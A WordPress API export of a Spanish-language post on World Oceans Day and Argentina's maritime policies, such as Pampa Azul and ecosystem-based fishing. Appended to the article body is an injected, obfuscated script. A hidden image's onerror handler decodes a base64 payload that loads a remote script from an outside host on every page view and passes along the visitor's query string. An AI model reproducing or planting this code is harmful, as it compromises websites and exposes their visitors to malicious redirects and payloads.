{"id":5353,"date":"2022-06-08T10:43:14","date_gmt":"2022-06-08T13:43:14","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5353"},"modified":"2025-08-13T16:19:02","modified_gmt":"2025-08-13T19:19:02","slug":"la-argentina-es-un-pais-bicontinental-y-oceanico-que-no-puede-pensarse-de-espaldas-al-mar","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5353","title":{"rendered":"La Argentina es un pa\u00eds bicontinental y oce\u00e1nico, que no puede pensarse de espaldas al mar"},"content":{"rendered":"\n<h6 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#043552\">El 8 de junio se celebra el \u201cD\u00eda Mundial de los Oc\u00e9anos\u201d, \u00a0evento creado por las Naciones Unidas a trav\u00e9s de la Resoluci\u00f3n 63\/111 del a\u00f1o 2008, con el objetivo de recordar el papel crucial que los oc\u00e9anos desempe\u00f1an en nuestras vidas y las formas en que se puede contribuir a su protecci\u00f3n.\u00a0 Este a\u00f1o se ha escogido el tema \u201cRevitalizaci\u00f3n: Acci\u00f3n Colectiva por el Oc\u00e9ano\u201d, teniendo en cuenta el marco dado por el Decenio de las Ciencias Oce\u00e1nicas de la ONU y la Conferencia de los Oc\u00e9anos, que se celebrar\u00e1 del 27 de junio al\u00a0 1\u00b0 de julio en Lisboa, Portugal.<\/h6>\n\n\n\n<p>La conmemoraci\u00f3n de este d\u00eda es una buena ocasi\u00f3n para recordar la importancia de los espacios mar\u00edtimos argentinos, que duplican el territorio emergido, y el valor de la biodiversidad&nbsp; y de los recursos all\u00ed presentes. En tal sentido, cabe destacar el firme compromiso de la Rep\u00fablica Argentina con el Objetivo de Desarrollo Sostenible (ODS) N\u00b0 14, que plantea: \u201c<em>Conservar y utilizar sosteniblemente los oc\u00e9anos, los mares y los recursos marinos\u201d.<\/em><\/p>\n\n\n\n<p>En virtud de lo expresado, nuestro pa\u00eds lleva adelante numerosas pol\u00edticas p\u00fablicas destinadas a la conservaci\u00f3n y la sostenibilidad del medio marino y sus recursos, con miras al desarrollo de nuestro pueblo.<\/p>\n\n\n\n<p>Entre ellas pueden destacarse la Iniciativa Pampa Azul, creada en 2014 y revitalizada en 2020, de car\u00e1cter estrat\u00e9gico y multidisciplinario, caracterizada por el trabajo coordinado de siete ministerios, con el prop\u00f3sito de promover el conocimiento cient\u00edfico de nuestro mar, impulsar innovaciones tecnol\u00f3gicas que contribuyan al fortalecimiento de las industrias a \u00e9l vinculadas y teniendo especialmente en cuenta al desarrollo econ\u00f3mico de las regiones mar\u00edtimas y de las comunidades costeras argentinas<\/p>\n\n\n\n<p>Asimismo, nuestro pa\u00eds promueve un enfoque ecosist\u00e9mico de la pesca, que permite asumir una mirada amplia de las pesquer\u00edas, teniendo en cuenta que la actividad se enmarca en un ambiente y en un contexto social determinado, que deben ser tenidos en cuenta a fin de lograr la sostenibilidad.<\/p>\n\n\n\n<p>Adem\u00e1s, y en el \u00e1mbito de esta Canciller\u00eda, fue creada la Coordinaci\u00f3n de Pol\u00edtica Oce\u00e1nica y del Atl\u00e1ntico Sur, dependiente de la Secretar\u00eda de Malvinas, Ant\u00e1rtida y Atl\u00e1ntico Sur, para apuntalar internacionalmente el liderazgo argentino en cuestiones de preservaci\u00f3n del medio marino y contribuir al desarrollo de pol\u00edticas de Estado en cuestiones relativas a los intereses mar\u00edtimos argentinos.<\/p>\n\n\n\n<p>Acciones&nbsp; como las mencionadas llevan a la pr\u00e1ctica una visi\u00f3n de pa\u00eds que asume la importancia de sus espacios mar\u00edtimos y el rol que ellos deben jugar en un modelo de desarrollo sustentable e inclusivo.<\/p>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 8 de junio se celebra el \u201cD\u00eda Mundial de los Oc\u00e9anos\u201d, \u00a0evento creado por las Naciones Unidas a trav\u00e9s de la Resoluci\u00f3n 63\/111 del a\u00f1o 2008, con el objetivo de recordar el papel crucial que los oc\u00e9anos desempe\u00f1an en nuestras vidas y las formas en que se puede contribuir a su protecci\u00f3n.\u00a0 Este a\u00f1o [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5354,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-5353","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5353"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5353\/revisions"}],"predecessor-version":[{"id":10661,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5353\/revisions\/10661"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5354"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}